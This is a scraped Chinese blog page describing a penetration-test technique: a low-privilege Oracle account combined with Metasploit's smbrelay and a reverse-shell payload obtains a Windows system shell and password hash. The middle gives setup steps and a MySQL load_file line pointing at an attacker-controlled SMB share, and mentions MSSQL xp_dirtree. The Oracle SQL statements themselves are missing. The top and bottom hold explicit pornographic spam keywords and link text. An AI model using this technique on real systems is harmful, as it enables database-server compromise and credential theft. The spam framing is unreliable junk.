好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁 > 知識庫 > Oracle 低權(quán)限數(shù)據(jù)庫賬戶得到 OS 訪問權(quán)限 提權(quán)利用

Oracle 低權(quán)限數(shù)據(jù)庫賬戶得到 OS 訪問權(quán)限 提權(quán)利用

熱門標(biāo)簽:沈陽400電話是如何辦理 地圖標(biāo)注付款了怎么找不到了 北京營銷外呼系統(tǒng)廠家 北京外呼系統(tǒng)公司排名 外呼系統(tǒng)口號 貴陽智能電銷機器人官網(wǎng) 百度地圖標(biāo)注員是干什么 溫州人工外呼系統(tǒng) 外呼系統(tǒng)鄭州

這幾天看了篇叫"Penetration: from application down to OS (Oracle)"的文檔,感覺挺有意思的,文檔的 大概意思就是說,如果 ORACLE 服務(wù)是用 administrator 賬戶啟動的,你只要有一個具有 resource 和 connect 權(quán)限的數(shù)據(jù)庫賬戶,就能利用 metasploit 的 smbrelay 功能,本地搭建一個 SMB 欺騙服務(wù)器, 來得到系統(tǒng)的訪問權(quán)限。我本地測試了下,還真的成功了。:-)

具體的原理分析看原文吧,我這里把我的測試過程寫出來.

我的滲透環(huán)境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 數(shù)據(jù)庫版本為 10.2.0.1.0,服務(wù)啟動權(quán)限為 administrator,數(shù)據(jù)庫賬戶用的是 dbsnmp 賬戶的默認(rèn)權(quán)限.0

1.先用 netstat 命令查看一下,本地的 139 端口有沒有占用,一般占用此端口的服務(wù)就是 Samba 了,要關(guān)掉。ubuntu 的關(guān)閉方法是 sudo /etc/init.d/samba stopp>1

2.運行 metasploit,我選用的 PAYLOAD 是 shell_reverse_tcp,做好相應(yīng)配置后,exploit.就能用 netstat 看到本地已經(jīng)監(jiān)聽了 139 和 8522 端口了.

2

3

3.我現(xiàn)在使用 dbsnmp 默認(rèn)賬戶連接到 oracle 數(shù)據(jù)庫上,這個賬戶默認(rèn)權(quán)限是比較低的,只有 connect和 resource 權(quán)限。

4.然后執(zhí)行下面 3 條 SQL 語句

 

5

6

7

后來經(jīng)過 pt007 的提醒,我又測試了 mysql,如果服務(wù)也是 administrator 啟動的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系統(tǒng)權(quán)限的.MSSQL 應(yīng)該用 xp_dirtree 存儲過程 也是可以的,不過我沒有配置出來用 administrator 賬戶啟動 MSSQL 服務(wù),希望知道的朋友指點下我。

這個技術(shù)可以用到內(nèi)網(wǎng) WEB 評估的時候,如果有注入,服務(wù)又是 administrator 啟動的,可以提權(quán)了。

兩個PDF下載,

作者:Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle%20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf

當(dāng)執(zhí)行完 create index 這句的時候,在看咱們本地的 metasploit,就已經(jīng)得到 ORACLE 數(shù)據(jù)庫主機的系 統(tǒng)當(dāng)前服務(wù)用戶的 half lm 哈希和 cmdshell 了。

您可能感興趣的文章:
  • Javascript中的幾種繼承方式對比分析
  • 淺析2種JavaScript繼承方式
  • Javascript編程中幾種繼承方式比較分析
  • JavaScript中的繼承方式詳解
  • javascript學(xué)習(xí)筆記(九)javascript中的原型(prototype)及原型鏈的繼承方式
  • JavaScript繼承方式實例
  • Linux下SVN服務(wù)器同時支持Apache的http和svnserve獨立服務(wù)器兩種模式且使用相同的訪問權(quán)限賬號
  • 深入解析yii權(quán)限分級式訪問控制的實現(xiàn)(非RBAC法)
  • Oracle 10g各個帳號的訪問權(quán)限、登錄路徑、監(jiān)控狀態(tài)命令查詢等等
  • 127.0.0.1無法訪問,沒有權(quán)限: GetObject
  • 使用Cacls命令設(shè)置服務(wù)器文件訪問權(quán)限
  • C++ 的三種訪問權(quán)限與三種繼承方式

標(biāo)簽:定西 包頭 淮北 衢州 潮州 衡水 通遼 溫州

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《Oracle 低權(quán)限數(shù)據(jù)庫賬戶得到 OS 訪問權(quán)限 提權(quán)利用》,本文關(guān)鍵詞  Oracle,低,權(quán)限,數(shù)據(jù)庫,賬戶,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Oracle 低權(quán)限數(shù)據(jù)庫賬戶得到 OS 訪問權(quán)限 提權(quán)利用》相關(guān)的同類信息!
  • 本頁收集關(guān)于Oracle 低權(quán)限數(shù)據(jù)庫賬戶得到 OS 訪問權(quán)限 提權(quán)利用的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    主站蜘蛛池模板: 边摸边吃奶边做很爽视频男女免费| 欧美日日夜夜| 69vj成人网在线看| 女人与拘做受免费观看| 羞羞色在线| 老子的大ji巴cao死你| 私人健身教练肉肉h文| 18禁男女午夜无遮挡网站免费| 精子喷进去女人高潮做| 亚洲精品午夜在线观看| 国产乱婬AV人妻无码电影| 节操何在h| 野花香在线观看免费观看高清视频 | 亚洲国产日韩a在线欧美2020| 牲欲强望女人电影| 爆头全面突袭完整版在线播放| 亚州视频一区二区三区| 欧美爆乳肥殿极品尤物图片| 国产在线观看免费人成短视频| 天天澡天天碰天天狠伊人五月| 久久久久久精品综合色8888| 老师让我?她喷出来了好爽视频| 国产69页| 扯下老师的裙子猛烈进入| bdsmcbt另类系列| 小荡货H边走边做H| 呦国产精品视频稀缺无码| 老司机午夜性大片| 性videosgratis灌满| 四色在线精品免费观看| 日韩AV国产欧美AⅤ综合Av| 国产在线观看国偷精品| 回娘家无删减1~5阅读视频| 黑白在线观看免费中文版| 免费看抖抈app入口| 成人精品一区二区三区尤物仙踪林 | 老牛影院免费观看电视剧的优点 | 韩国漫画免费观看| 搡老女人ⅩXXX搡老女小说| fc2人成共享视频在线观看的演员| 亚洲精品欧美|